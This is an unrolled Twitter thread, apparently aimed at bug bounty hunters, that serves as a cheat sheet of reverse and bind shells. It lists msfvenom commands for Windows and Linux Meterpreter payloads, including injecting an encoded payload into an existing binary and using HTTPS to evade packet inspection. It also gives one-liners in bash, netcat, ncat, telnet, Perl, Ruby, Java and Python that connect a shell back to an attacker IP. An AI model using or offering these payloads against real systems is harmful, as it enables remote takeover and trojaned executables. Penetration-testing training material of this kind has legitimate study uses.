Abhishek Meena - {🔥} Profile picture
Nov 1, 2022 16 tweets 13 min read Read on X
Reverse-shells🔥🌵 #bugbounty #infosec

This is s great collection of different types of reverse shells and webshells. Many of the ones listed below comes from this cheat-sheet: #bugbountytips

See🧵(1/n) :👇🏻
🏹For Windows : #bugbounty #infosec

➡Meterpreter #Reverse_shells

▪msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe

▪use exploit/multi/handler &
set payload windows/meterpreter/reverse_tcp
➡Meterpreter HTTPS #bugbounty #infosec

It is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections.

▪msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
➡Non-staged payload #bugbounty

▪ msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe

This must be caught with metasploit. It does not work with netcat.

▪use exploit/multi/handler &
set payload windows/shell/reverse_tcp
➡Staged payload #bugbounty #infosec

▪msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe

This must be caught with metasploit. It does not work with netcat

▪use exploit/multi/handler &
set payload windows/shell/reverse_tcp
➡Inject payload into binary #bugbounty #infosec

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe
🏹Linux #bugbounty #infosec #Reverse_shells

➡Binary

▪msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f elf > shell.elf

➡Bash

▪0<&196;exec 196<>/dev/tcp/192.168.1.101/80; sh <&196 >&196 2>&196

▪bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
➡Php #bugbounty #infosec #Reverse_shells

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'

🏹Netcat

➡Bind shell

#Linux
nc -vlp 5555 -e /bin/bash
nc 192.168.1.101 5555

# Windows
nc.exe -nlvp 4444 -e cmd.exe
➡Reverse shell #bugbounty #infosec #Reverse_shells

# Linux
nc -lvp 5555
nc 192.168.1.101 5555 -e /bin/bash

# Windows
nc -lvp 443
nc.exe 192.168.1.101 443 -e cmd.exe

➡With -e flag

▪nc -e /bin/sh ATTACKING-IP 80
▪/bin/sh | nc ATTACKING-IP 80
➡Without -e flag #bugbounty

▪rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

🏹Ncat

Ncat is a better and more modern version of netcat. It has encryption

➡Bind

▪ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
▪ncat -v 192.168.1.103 5555 --ssl
🏹Telnet #bugbounty #infosec #Reverse_shells

➡rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

➡telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
🏹Perl #bugbounty #infosec #Reverse_shells


perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
🏹Ruby #bugbounty #infosec #Reverse_shells


ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
🏹Java #bugbounty #infosec #Reverse_shells


r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

p.waitFor()
🏹Python #bugbounty


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Hope you like this 😀

Check out #bugbounty telegram group for :

➡Best Tips for Bug Bounty
➡Good And Informative Articles From Infosec Community
➡One-liners Command
➡Infosec Resources
➡ebooks - Paid ?😎
➡And Many More

Link : t.me/bugbountyresou…

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Abhishek Meena - {🔥}

Abhishek Meena - {🔥} Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @aacle_

Jun 2, 2023
Some of the major vulnerabilities and related POC’s:

➡SQLi
➡XSS
➡SSRF
➡XXE
➡Path Traversal
➡Open Redirection
➡Account Takeover
➡Remote code execution
➡IDOR
➡CSRF

#hacking #bugbounty #bugbountytips

Are Found Below🧵(1/n)👇
Read 13 tweets
Feb 26, 2023
OS Command Injection 🕸️🔖

Allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application

leads to fully compromising the application and all its data.

Thread 🧵 : 👇
Anatomy for OS Command Injection attack

Two basic ways attackers deploy OS command injection
• It accepts outside input as arguments. These arguments trigger various actions and behavior.

The attack script accesses the system call (“nslookup [hostname]”) to run nslookup with the HOSTNAME appearing as an argument from the user.
Read 32 tweets
Feb 24, 2023
A JavaScript bookmarklet for extracting all webpage endpoint links on a page.

Created by @renniepak, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on webpage.

1/n
Usage (Bookmarklet)

Create a bookmarklet...

• Right-click your bookmark bar
• Click 'Add Page'
• Paste the above Javascript in the 'url' box
• Click 'Save'

...then visit the victim page in the browser and click the bookmarklet.

carbon.now.sh/?bg=rgba%2842%…
Usage (Console)

Paste the above Javascript into the console window F12 and press enter.
Read 4 tweets
Feb 9, 2023
Difference Between GET, POST, PUT, DELETE, HEAD, and PATCH Request Methods

Open The Thread 🧵 :👇🏻 GET, POST, PUT, DELETE, HEAD, and PATCH Request Methods
📌 GET:

This method is used to retrieve information from a server.

When a client sends a GET request to a server, the server returns the requested information in the response.

GET requests are typically used to retrieve data from a web server.
📌 POST:

This method is used to send data to a server.

POST requests are typically used to submit form data to a server or to upload a file.

When a client sends a POST request to a server, the data is included in the body of the request and can be processed by the server.
Read 9 tweets
Feb 8, 2023
✨Awesome Bug Bounty Tools For: 🙌👇🏻

• Subdomain Enumeration
• Content Discovery
• Exploitation
• CMS
• Git
• Frameworks Tools
• Wordlists

Open The Thread🧵:👇
▪ Subdomain Enumeration Tools List

—————————
I've opened My Bug Bounty tips Group =>
Join Link: t.me/bugbountyresou…
————————— ▪ Subdomain Enumeration Tools List
▪ Content Discovery Content Discovery
Read 10 tweets
Feb 7, 2023
⚡Security Misconfiguration 🌻

One of the top causes of website and application vulnerabilities.

It occurs when systems are not properly configured, leaving them open to attack.

Thread ( 1/10 ) : 🧵 Security Misconfiguration
💻Security Misconfiguration Occurance:

• Inadequate security hardening & improper configs in app stack/cloud services

• Enabled unnecessary features/ports/services/accounts/privileges

• Default accounts with unchanged passwords

• Error handling revealing sensitive info
• Unsecured upgrades & disabled security features

• Insecure values in app servers, frameworks, libraries, & databases

• Insufficient security headers or directives

• Outdated & vulnerable software

• Regular security assessments can help prevent misconfigurations.
Read 11 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

:(